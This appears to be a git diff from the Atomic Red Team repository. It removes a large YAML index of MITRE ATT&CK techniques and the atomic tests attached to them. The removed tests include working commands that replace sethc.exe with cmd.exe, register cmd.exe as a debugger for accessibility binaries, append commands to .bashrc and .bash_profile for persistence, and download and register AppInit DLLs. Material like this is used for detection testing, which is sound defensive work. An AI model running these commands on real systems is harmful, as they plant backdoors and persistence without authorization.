[Office Application Startup](../../T1137/T1137.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Window](../../T1564.003/T1564.003.md) | Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | +| | | Office Template Macros [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hide Artifacts](../../T1564/T1564.md) | Web Cookies [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | +| | | [Office Test](../../T1137.002/T1137.002.md) | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | +| | | Outlook Forms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Port Monitors](../../T1547.010/T1547.010.md) | Impair Command History Logging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Windows Credential Manager [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | +| | | [Outlook Home Page](../../T1137.004/T1137.004.md) | Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | Outlook Rules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [PowerShell Profile](../../T1546.013/T1546.013.md) | Indicator Blocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | [Password Filter DLL](../../T1556.002/T1556.002.md) | Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Indicator Removal on Host](../../T1070/T1070.md) | | | | | | | | +| | | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Hollowing](../../T1055.012/T1055.012.md) | [Indirect Command Execution](../../T1202/T1202.md) | | | | | | | | +| | | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Injection](../../T1055/T1055.md) | [Install Root Certificate](../../T1553.004/T1553.004.md) | | | | | | | | +| | | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [InstallUtil](../../T1218.004/T1218.004.md) | | | | | | | | +| | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Invalid Code Signature [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | [Port Monitors](../../T1547.010/T1547.010.md) | [Scheduled Task](../../T1053.005/T1053.005.md) | [Local Accounts](../../T1078.003/T1078.003.md) | | | | | | | | +| | | [PowerShell Profile](../../T1546.013/T1546.013.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [MSBuild](../../T1127.001/T1127.001.md) | | | | | | | | +| | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Screensaver](../../T1546.002/T1546.002.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Support Provider](../../T1547.005/T1547.005.md) | Mark-of-the-Web Bypass [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Masquerade Task or Service](../../T1036.004/T1036.004.md) | | | | | | | | | | | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Masquerading](../../T1036/T1036.md) | | | | | | | | | | | SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Shortcut Modification](../../T1547.009/T1547.009.md) | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 639466f6..30abba87 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -1,18085 +1,22 @@ --- -privilege-escalation: - T1546.004: - technique: - external_references: - - source_name: mitre-attack - external_id: T1546.004 - url: https://attack.mitre.org/techniques/T1546/004 - - url: https://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/ - description: Claud Xiao, Cong Zheng, Yanhui Jia. (2017, April 6). New IoT/Linux - Malware Targets DVRs, Forms Botnet. Retrieved February 19, 2018. - source_name: amnesia malware - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: ".bash_profile and .bashrc" - description: |- - Adversaries may establish persistence by executing malicious content triggered by a user’s shell. ~/.bash_profile and ~/.bashrc are shell scripts that contain shell commands. These files are executed in a user's context when a new shell opens or when a user logs in so that their environment is set correctly. - - ~/.bash_profile is executed for login shells and ~/.bashrc is executed for interactive non-login shells. This means that when a user logs in (via username and password) to the console (either locally or remotely via something like SSH), the ~/.bash_profile script is executed before the initial command prompt is returned to the user. After that, every time a new shell is opened, the ~/.bashrc script is executed. This allows users more fine-grained control over when they want certain commands executed. These shell scripts are meant to be written to by the local user to configure their own environment. - - The macOS Terminal.app is a little different in that it runs a login shell by default each time a new terminal window is opened, thus calling ~/.bash_profile each time instead of ~/.bashrc. - - Adversaries may abuse these shell scripts by inserting arbitrary shell commands that may be used to execute other binaries to gain persistence. Every time the user logs in or opens a new shell, the modified ~/.bash_profile and/or ~/.bashrc scripts will be executed.(Citation: amnesia malware) - id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-03-24T16:28:04.990Z' - created: '2020-01-24T14:13:45.936Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - User - - Administrator - x_mitre_detection: While users may customize their ~/.bashrc and - ~/.bash_profile files , there are only certain types of commands - that typically appear in these files. Monitor for abnormal commands such as - execution of unknown programs, opening network sockets, or reaching out across - the network when user profiles are loaded during the login process. - x_mitre_data_sources: - - Process use of network - - Process command-line parameters - - Process monitoring - - File monitoring - x_mitre_platforms: - - Linux - - macOS - identifier: T1546.004 - atomic_tests: - - name: Add command to .bash_profile - auto_generated_guid: 94500ae1-7e31-47e3-886b-c328da46872f - description: 'Adds a command to the .bash_profile file of the current user - -' - supported_platforms: - - macos - - linux - input_arguments: - command_to_add: - description: Command to add to the .bash_profile file - type: string - default: "/path/to/script.py" - executor: - command: 'echo "#{command_to_add}" >> ~/.bash_profile - -' - name: sh - - name: Add command to .bashrc - auto_generated_guid: 0a898315-4cfa-4007-bafe-33a4646d115f - description: 'Adds a command to the .bashrc file of the current user - -' - supported_platforms: - - macos - - linux - input_arguments: - command_to_add: - description: Command to add to the .bashrc file - type: string - default: "/path/to/script.py" - executor: - command: 'echo "#{command_to_add}" >> ~/.bashrc - -' - name: sh - T1548: - technique: - external_references: - - source_name: mitre-attack - external_id: T1548 - url: https://attack.mitre.org/techniques/T1548 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Abuse Elevation Control Mechanism - description: Adversaries may circumvent mechanisms designed to control elevate - privileges to gain higher-level permissions. Most modern systems contain native - elevation control mechanisms that are intended to limit privileges that a - user can perform on a machine. Authorization has to be granted to specific - users in order to perform tasks that can be considered of higher risk. An - adversary can perform several methods to take advantage of built-in control - mechanisms in order to escalate privileges on a system. - id: attack-pattern--67720091-eee3-4d2d-ae16-8264567f6f5b - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: defense-evasion - modified: '2020-07-22T21:36:52.825Z' - created: '2020-01-30T13:58:14.373Z' - x_mitre_data_sources: - - Windows Registry - - File monitoring - - Process command-line parameters - - API monitoring - - Process monitoring - x_mitre_permissions_required: - - Administrator - - User - x_mitre_detection: |- - Monitor the file system for files that have the setuid or setgid bits set. Also look for any process API calls for behavior that may be indicative of [Process Injection](https://attack.mitre.org/techniques/T1055) and unusual loaded DLLs through [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), which indicate attempts to gain access to higher privileged processes. On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo). - - Consider monitoring for /usr/libexec/security_authtrampoline executions which may indicate that AuthorizationExecuteWithPrivileges is being executed. MacOS system logs may also indicate when AuthorizationExecuteWithPrivileges is being called. Monitoring OS API callbacks for the execution can also be a way to detect this behavior but requires specialized security tooling. - - On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo). This technique is abusing normal functionality in macOS and Linux systems, but sudo has the ability to log all input and output based on the LOG_INPUT and LOG_OUTPUT directives in the /etc/sudoers file. - - There are many ways to perform UAC bypasses when a user is in the local administrator group on a system, so it may be difficult to target detection on all variations. Efforts should likely be placed on mitigation and collecting enough information on process launches and actions that could be performed before and after a UAC bypass is performed. Some UAC bypass methods rely on modifying specific, user-accessible Registry settings. Analysts should monitor Registry settings for unauthorized changes. - x_mitre_version: '1.0' - x_mitre_is_subtechnique: false - x_mitre_platforms: - - Linux - - macOS - - Windows - atomic_tests: [] - T1134: - technique: - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1134 - url: https://attack.mitre.org/techniques/T1134 - - external_id: CAPEC-633 - source_name: capec - url: https://capec.mitre.org/data/definitions/633.html - - url: https://pentestlab.blog/2017/04/03/token-manipulation/ - description: netbiosX. (2017, April 3). Token Manipulation. Retrieved April - 21, 2017. - source_name: Pentestlab Token Manipulation - - url: https://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/manage/component-updates/command-line-process-auditing - description: Mathers, B. (2017, March 7). Command line process auditing. Retrieved - April 21, 2017. - source_name: Microsoft Command-line Logging - - url: https://msdn.microsoft.com/en-us/library/windows/desktop/aa378184(v=vs.85).aspx - description: Microsoft TechNet. (n.d.). Retrieved April 25, 2017. - source_name: Microsoft LogonUser - - url: https://msdn.microsoft.com/en-us/library/windows/desktop/aa446617(v=vs.85).aspx - description: Microsoft TechNet. (n.d.). Retrieved April 25, 2017. - source_name: Microsoft DuplicateTokenEx - - url: https://msdn.microsoft.com/en-us/library/windows/desktop/aa378612(v=vs.85).aspx - description: Microsoft TechNet. (n.d.). Retrieved April 25, 2017. - source_name: Microsoft ImpersonateLoggedOnUser - - url: https://www.blackhat.com/docs/eu-17/materials/eu-17-Atkinson-A-Process-Is-No-One-Hunting-For-Token-Manipulation.pdf - description: 'Atkinson, J., Winchester, R. (2017, December 7). A Process is - No One: Hunting for Token Manipulation. Retrieved December 21, 2017.' - source_name: BlackHat Atkinson Winchester Token Manipulation - description: |- - Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token. - - An adversary can use built-in Windows API functions to copy access tokens from existing processes; this is known as token stealing. These token can then be applied to an existing process (i.e. [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001)) or used to spawn a new process (i.e. [Create Process with Token](https://attack.mitre.org/techniques/T1134/002)). An adversary must already be in a privileged user context (i.e. administrator) to steal a token. However, adversaries commonly use token stealing to elevate their security context from the administrator level to the SYSTEM level. An adversary can then use a token to authenticate to a remote system as the account for that token if the account has appropriate permissions on the remote system.(Citation: Pentestlab Token Manipulation) - - Any standard user can use the runas command, and the Windows API functions, to create impersonation tokens; it does not require access to an administrator account. There are also other mechanisms, such as Active Directory fields, that can be used to modify access tokens. - name: Access Token Manipulation - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - id: attack-pattern--dcaa092b-7de9-4a21-977f-7fcb77e89c48 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-04-16T19:37:02.355Z' - created: '2017-12-14T16:46:06.044Z' - x_mitre_defense_bypassed: - - Windows User Account Control - - System access controls - - File system access controls - - Heuristic Detection - - Host forensic analysis - x_mitre_is_subtechnique: false - x_mitre_version: '2.0' - x_mitre_contributors: - - Tom Ueltschi @c_APT_ure - - Travis Smith, Tripwire - - Robby Winchester, @robwinchester3 - - Jared Atkinson, @jaredcatkinson - x_mitre_data_sources: - - Authentication logs - - Windows event logs - - API monitoring - - Access tokens - - Process monitoring - - Process command-line parameters - x_mitre_detection: "If an adversary is using a standard command-line shell, - analysts can detect token manipulation by auditing command-line activity. - Specifically, analysts should look for use of the runas command. - Detailed command-line logging is not enabled by default in Windows.(Citation: - Microsoft Command-line Logging)\n\nIf an adversary is using a payload that - calls the Windows token APIs directly, analysts can detect token manipulation - only through careful analysis of user network activity, examination of running - processes, and correlation with other endpoint and network behavior. \n\nThere - are many Windows API calls a payload can take advantage of to manipulate access - tokens (e.g., LogonUser (Citation: Microsoft LogonUser), DuplicateTokenEx(Citation: - Microsoft DuplicateTokenEx), and ImpersonateLoggedOnUser(Citation: - Microsoft ImpersonateLoggedOnUser)). Please see the referenced Windows API - pages for more information.\n\nQuery systems for process and thread token - information and look for inconsistencies such as user owns processes impersonating - the local SYSTEM account.(Citation: BlackHat Atkinson Winchester Token Manipulation)\n\nLook - for inconsistencies between the various fields that store PPID information, - such as the EventHeader ProcessId from data collected via Event Tracing for - Windows (ETW), Creator Process ID/Name from Windows event logs, and the ProcessID - and ParentProcessID (which are also produced from ETW and other utilities - such as Task Manager and Process Explorer). The ETW provided EventHeader ProcessId - identifies the actual parent process." - x_mitre_permissions_required: - - User - - Administrator - x_mitre_effective_permissions: - - SYSTEM - x_mitre_platforms: - - Windows - atomic_tests: [] - T1546.008: - technique: - external_references: - - source_name: mitre-attack - external_id: T1546.008 - url: https://attack.mitre.org/techniques/T1546/008 - - external_id: CAPEC-558 - source_name: capec - url: https://capec.mitre.org/data/definitions/558.html - - url: https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-1.html - description: 'Glyer, C., Kazanciyan, R. (2012, August 20). The “Hikit” Rootkit: - Advanced and Persistent Attack Techniques (Part 1). Retrieved June 6, 2016.' - source_name: FireEye Hikit Rootkit - - url: https://www.slideshare.net/DennisMaldonado5/sticky-keys-to-the-kingdom - description: Maldonado, D., McGuffin, T. (2016, August 6). Sticky Keys to - the Kingdom. Retrieved July 5, 2017. - source_name: DEFCON2016 Sticky Keys - - url: http://blog.crowdstrike.com/registry-analysis-with-crowdresponse/ - description: Tilbury, C. (2014, August 28). Registry Analysis with CrowdResponse. - Retrieved November 12, 2014. - source_name: Tilbury 2014 - - source_name: Narrator Accessibility Abuse - url: https://giuliocomi.blogspot.com/2019/10/abusing-windows-10-narrators-feedback.html - description: Comi, G. (2019, October 19). Abusing Windows 10 Narrator's 'Feedback-Hub' - URI for Fileless Persistence. Retrieved April 28, 2020. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Accessibility Features - description: |- - Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system. - - Two common accessibility programs are C:\Windows\System32\sethc.exe, launched when the shift key is pressed five times and C:\Windows\System32\utilman.exe, launched when the Windows + U key combination is pressed. The sethc.exe program is often referred to as "sticky keys", and has been used by adversaries for unauthenticated access through a remote desktop login screen. (Citation: FireEye Hikit Rootkit) - - Depending on the version of Windows, an adversary may take advantage of these features in different ways. Common methods used by adversaries include replacing accessibility feature binaries or pointers/references to these binaries in the Registry. In newer versions of Windows, the replaced binary needs to be digitally signed for x64 systems, the binary must reside in %systemdir%\, and it must be protected by Windows File or Resource Protection (WFP/WRP). (Citation: DEFCON2016 Sticky Keys) The [Image File Execution Options Injection](https://attack.mitre.org/techniques/T1546/012) debugger method was likely discovered as a potential workaround because it does not require the corresponding accessibility feature binary to be replaced. - - For simple binary replacement on Windows XP and later as well as and Windows Server 2003/R2 and later, for example, the program (e.g., C:\Windows\System32\utilman.exe) may be replaced with "cmd.exe" (or another program that provides backdoor access). Subsequently, pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the replaced file to be executed with SYSTEM privileges. (Citation: Tilbury 2014) - - Other accessibility features exist that may also be leveraged in a similar fashion: (Citation: DEFCON2016 Sticky Keys)(Citation: Narrator Accessibility Abuse) - - * On-Screen Keyboard: C:\Windows\System32\osk.exe - * Magnifier: C:\Windows\System32\Magnify.exe - * Narrator: C:\Windows\System32\Narrator.exe - * Display Switcher: C:\Windows\System32\DisplaySwitch.exe - * App Switcher: C:\Windows\System32\AtBroker.exe - id: attack-pattern--70e52b04-2a0c-4cea-9d18-7149f1df9dc5 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-05-13T20:37:30.048Z' - created: '2020-01-24T14:32:40.315Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_effective_permissions: - - SYSTEM - x_mitre_permissions_required: - - Administrator - x_mitre_detection: Changes to accessibility utility binaries or binary paths - that do not correlate with known software, patch cycles, etc., are suspicious. - Command line invocation of tools capable of modifying the Registry for associated - keys are also suspicious. Utility arguments and the binaries themselves should - be monitored for changes. Monitor Registry keys within HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows - NT\CurrentVersion\Image File Execution Options. - x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - - File monitoring - - Windows Registry - x_mitre_contributors: - - Paul Speulstra, AECOM Global Security Operations Center - x_mitre_platforms: - - Windows - identifier: T1546.008 - atomic_tests: - - name: Attaches Command Prompt as a Debugger to a List of Target Processes - auto_generated_guid: 3309f53e-b22b-4eb6-8fd2-a6cf58b355a9 - description: | - Attaches cmd.exe to a list of processes. Configure your own Input arguments to a different executable or list of executables. - - Upon successful execution, powershell will modify the registry and swap osk.exe with cmd.exe. - supported_platforms: - - windows - input_arguments: - parent_list: - description: 'Comma separated list of system binaries to which you want - to attach each #{attached_process}. Default: "osk.exe" - -' - type: String - default: osk.exe, sethc.exe, utilman.exe, magnify.exe, narrator.exe, DisplaySwitch.exe, - atbroker.exe - attached_process: - description: 'Full path to process to attach to target in #{parent_list}. - Default: cmd.exe - -' - type: Path - default: C:\windows\system32\cmd.exe - executor: - command: | - $input_table = "#{parent_list}".split(",") - $Name = "Debugger" - $Value = "#{attached_process}" - Foreach ($item in $input_table){ - $item = $item.trim() - $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$item" - IF(!(Test-Path $registryPath)) - { - New-Item -Path $registryPath -Force - New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force - } - ELSE - { - New-ItemProperty -Path $registryPath -Name $name -Value $Value - } - } - cleanup_command: | - $input_table = "#{parent_list}".split(",") - Foreach ($item in $input_table) - { - $item = $item.trim() - reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$item" /v Debugger /f 2>&1 | Out-Null - } - name: powershell - elevation_required: true - - name: Replace binary of sticky keys - auto_generated_guid: 934e90cf-29ca-48b3-863c-411737ad44e3 - description: 'Replace sticky keys binary (sethc.exe) with cmd.exe - -' - supported_platforms: - - windows - executor: - command: | - copy C:\Windows\System32\sethc.exe C:\Windows\System32\sethc_backup.exe - takeown /F C:\Windows\System32\sethc.exe /A - icacls C:\Windows\System32\sethc.exe /grant Administrators:F /t - copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe - cleanup_command: 'copy /Y C:\Windows\System32\sethc_backup.exe C:\Windows\System32\sethc.exe - -' - name: command_prompt - elevation_required: true - T1546.009: - technique: - external_references: - - source_name: mitre-attack - external_id: T1546.009 - url: https://attack.mitre.org/techniques/T1546/009 - - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process - description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: - A Technical Survey Of Common And Trending Process Injection Techniques. - Retrieved December 7, 2017.' - source_name: Endgame Process Injection July 2017 - - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 - description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. - Retrieved June 6, 2016. - source_name: TechNet Autoruns - - url: https://forum.sysinternals.com/appcertdlls_topic12546.html - description: Microsoft. (2007, October 24). Windows Sysinternals - AppCertDlls. - Retrieved December 18, 2017. - source_name: Sysinternals AppCertDlls Oct 2007 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: AppCert DLLs - description: "Adversaries may establish persistence and/or elevate privileges - by executing malicious content triggered by AppCert DLLs loaded into processes. - Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs - Registry key under HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session - Manager\\ are loaded into every process that calls the ubiquitously - used application programming interface (API) functions CreateProcess, - CreateProcessAsUser, CreateProcessWithLoginW, CreateProcessWithTokenW, - or WinExec. (Citation: Endgame Process Injection July 2017)\n\nSimilar - to [Process Injection](https://attack.mitre.org/techniques/T1055), this value - can be abused to obtain elevated privileges by causing a malicious DLL to - be loaded and run in the context of separate processes on the computer. Malicious - AppCert DLLs may also provide persistence by continuously being triggered - by API activity. " - id: attack-pattern--7d57b371-10c2-45e5-b3cc-83a8fb380e4c - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-03-24T20:22:45.298Z' - created: '2020-01-24T14:47:41.795Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_effective_permissions: - - Administrator - - SYSTEM - x_mitre_permissions_required: - - Administrator - - SYSTEM - x_mitre_detection: "Monitor DLL loads by processes, specifically looking for - DLLs that are not recognized or not normally loaded into a process. Monitor - the AppCertDLLs Registry value for modifications that do not correlate with - known software, patch cycles, etc. Monitor and analyze application programming - interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx - and RegSetValueEx. (Citation: Endgame Process Injection July 2017) \n\nTools - such as Sysinternals Autoruns may overlook AppCert DLLs as an auto-starting - location. (Citation: TechNet Autoruns) (Citation: Sysinternals AppCertDlls - Oct 2007)\n\nLook for abnormal process behavior that may be due to a process - loading a malicious DLL. Data and events should not be viewed in isolation, - but as part of a chain of behavior that could lead to other activities, such - as making network connections for Command and Control, learning details about - the environment through Discovery, and conducting Lateral Movement." - x_mitre_data_sources: - - Windows Registry - - Process command-line parameters - - Process monitoring - - Loaded DLLs - x_mitre_platforms: - - Windows - atomic_tests: [] - T1546.010: - technique: - external_references: - - source_name: mitre-attack - external_id: T1546.010 - url: https://attack.mitre.org/techniques/T1546/010 - - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process - description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: - A Technical Survey Of Common And Trending Process Injection Techniques. - Retrieved December 7, 2017.' - source_name: Endgame Process Injection July 2017 - - url: https://support.microsoft.com/en-us/kb/197571 - description: Microsoft. (2006, October). Working with the AppInit_DLLs registry - value. Retrieved July 15, 2015. - source_name: AppInit Registry - - url: https://msdn.microsoft.com/en-us/library/dn280412 - description: Microsoft. (n.d.). AppInit DLLs and Secure Boot. Retrieved July - 15, 2015. - source_name: AppInit Secure Boot - - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 - description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. - Retrieved June 6, 2016. - source_name: TechNet Autoruns - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: AppInit DLLs - description: "Adversaries may establish persistence and/or elevate privileges - by executing malicious content triggered by AppInit DLLs loaded into processes. - Dynamic-link libraries (DLLs) that are specified in the AppInit_DLLs - value in the Registry keys HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows - NT\\CurrentVersion\\Windows or HKEY_LOCAL_MACHINE\\Software\\Wow6432Node\\Microsoft\\Windows - NT\\CurrentVersion\\Windows are loaded by user32.dll into every process - that loads user32.dll. In practice this is nearly every program, since user32.dll - is a very common library. (Citation: Endgame Process Injection July 2017)\n\nSimilar - to Process Injection, these values can be abused to obtain elevated privileges - by causing a malicious DLL to be loaded and run in the context of separate - processes on the computer. (Citation: AppInit Registry) Malicious AppInit - DLLs may also provide persistence by continuously being triggered by API activity. - \n\nThe AppInit DLL functionality is disabled in Windows 8 and later versions - when secure boot is enabled. (Citation: AppInit Secure Boot)" - id: attack-pattern--cc89ecbd-3d33-4a41-bcca-001e702d18fd - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-03-24T20:34:09.996Z' - created: '2020-01-24T14:52:25.589Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_system_requirements: - - Secure boot disabled on systems running Windows 8 and later - x_mitre_effective_permissions: - - Administrator - - SYSTEM - x_mitre_permissions_required: - - Administrator - x_mitre_detection: "Monitor DLL loads by processes that load user32.dll and - look for DLLs that are not recognized or not normally loaded into a process. - Monitor the AppInit_DLLs Registry values for modifications that do not correlate - with known software, patch cycles, etc. Monitor and analyze application programming - interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx - and RegSetValueEx. (Citation: Endgame Process Injection July - 2017)\n\nTools such as Sysinternals Autoruns may also be used to detect system - changes that could be attempts at persistence, including listing current AppInit - DLLs. (Citation: TechNet Autoruns) \n\nLook for abnormal process behavior - that may be due to a process loading a malicious DLL. Data and events should - not be viewed in isolation, but as part of a chain of behavior that could - lead to other activities, such as making network connections for Command and - Control, learning details about the environment through Discovery, and conducting - Lateral Movement." - x_mitre_data_sources: - - Windows Registry - - Process command-line parameters - - Process monitoring - - Loaded DLLs - x_mitre_platforms: - - Windows - identifier: T1546.010 - atomic_tests: - - name: Install AppInit Shim - auto_generated_guid: a58d9386-3080-4242-ab5f-454c16503d18 - description: "AppInit_DLLs is a mechanism that allows an arbitrary list of DLLs - to be loaded into each user mode process on the system. Upon succesfully execution, - \nyou will see the message \"The operation completed successfully.\" Each - time the DLL is loaded, you will see a message box with a message of \"Install - AppInit Shim DLL was called!\" appear.\nThis will happen regularly as your - computer starts up various applications and may in fact drive you crazy. A - reliable way to make the message box appear and verify the \nAppInit Dlls - are loading is to start the notepad application. Be sure to run the cleanup - commands afterwards so you don't keep getting message boxes showing up\n" - supported_platforms: - - windows - input_arguments: - registry_file: - description: Windows Registry File - type: Path - default: PathToAtomicsFolder\T1546.010\src\T1546.010.reg - registry_cleanup_file: - description: Windows Registry File - type: Path - default: PathToAtomicsFolder\T1546.010\src\T1546.010-cleanup.reg - dependency_executor_name: powershell - dependencies: - - description: 'Reg files must exist on disk at specified locations (#{registry_file} - and #{registry_cleanup_file}) - -' - prereq_command: 'if ((Test-Path #{registry_file}) -and (Test-Path #{registry_cleanup_file})) - {exit 0} else {exit 1} - -' - get_prereq_command: | - [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - New-Item -Type Directory (split-path #{registry_file}) -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/src/T1546.010.reg" -OutFile "#{registry_file}" - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/src/T1546.010-cleanup.reg" -OutFile "#{registry_cleanup_file}" - - description: 'DLL''s must exist in the C:\Tools directory (T1546.010.dll and - T1546.010x86.dll) - -' - prereq_command: 'if ((Test-Path c:\Tools\T1546.010.dll) -and (Test-Path c:\Tools\T1546.010x86.dll)) - {exit 0} else {exit 1} - -' - get_prereq_command: | - New-Item -Type Directory C:\Tools -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/bin/T1546.010.dll" -OutFile C:\Tools\T1546.010.dll - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/bin/T1546.010x86.dll" -OutFile C:\Tools\T1546.010x86.dll - executor: - command: 'reg.exe import #{registry_file} - -' - cleanup_command: 'reg.exe import #{registry_cleanup_file} >nul 2>&1 - -' - name: command_prompt - 